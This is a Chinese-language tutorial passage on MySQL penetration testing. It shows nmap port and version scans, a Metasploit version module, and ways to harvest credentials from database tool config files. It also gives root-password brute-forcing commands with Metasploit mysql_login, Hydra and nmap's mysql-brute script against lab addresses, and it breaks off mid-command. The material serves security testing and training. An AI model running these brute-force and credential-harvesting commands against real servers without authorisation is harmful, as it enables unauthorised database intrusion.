当前位置:   article > 正文

MySQL数据库安全测试

MySQL数据库安全测试

一、MySQL信息收集

1、端口信息收集

Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用:

(1)nmap扫描nmap -p 3306 192.168.37.1-254

(2)iisputter,直接填写3306端口,IP地址填写单个或者C段地址。

特定目标的渗透,可能需要对全端口进行扫描,可以使用Nmap对某一个IP地址进行全端口扫描。

2、版本信息收集

(1)msf查看版本信息auxiliary/scanner/mysql/mysql_version模块,以扫描主机192.168.37.136为例,命令为:

use auxiliary/scanner/mysql/mysql_version

set rhosts 192.168.37.136

run

能成功查询到版本说明此数据库允许外链,可进行爆破,不允许外链则挖法查询到数据库版本:

此时,可使用nmap探测数据库版本信息,命令为:

nmap --script=mysql-info 192.168.37.136

(2)mysql查询版本命令为:

SELECT version();

3、数据库管理信息收集

Mysql管理工具有多种,比如phpMyAdmin网站管理系统,Navicat for MySQL以及MysqlFront等客户端工具。这些工具有的会直接保存配置信息,这些信息包含数据库服务器地址和数据库用户名以及密码,通过嗅探或者破解配置文件可以获取密码等信息。

二、获取MySQL密码

1、msf爆破

msf破解mysql密码模块auxiliary/scanner/mysql/mysql_login,以爆破主机192.168.37.136的root密码为例,命令为:

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.37.136

set pass_file /root/top1000.txt

set username root

run

爆破成功,获取到root账户密码为root。

2、使用Hydra爆破

使用Hydra可以爆破MySQL的登录账户及密码,可指定用户名或者用户名字典以及密码或者密码字典,以爆破主机192.168.37.136的root密码为例命令为:hydra -l root -P /root/top1000.txt 192.168.37.136 mysql

成功获取到root账户的密码为root。

3、网页在线连接破解

可以使用burpsuite和phpMyAdmin多线程批量破解工具。

4、使用nmap扫描并破解密码

(1)对某一个IP或者IP地址段进行nmap默认密码暴力破解并扫描

nmap --script=mysql-brute 192.168.37.136

nmap --script=mysql-brute 192.168.37.1-254

(2)使用root账号root密码进行mysql密码验证并扫描获取指定IP地址的端口信息以及mysql数据库相关信息

nmap -sV --script=mysql-databa

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/秋刀鱼在做梦/article/detail/928238
推荐阅读
相关标签
  

闽ICP备14008679号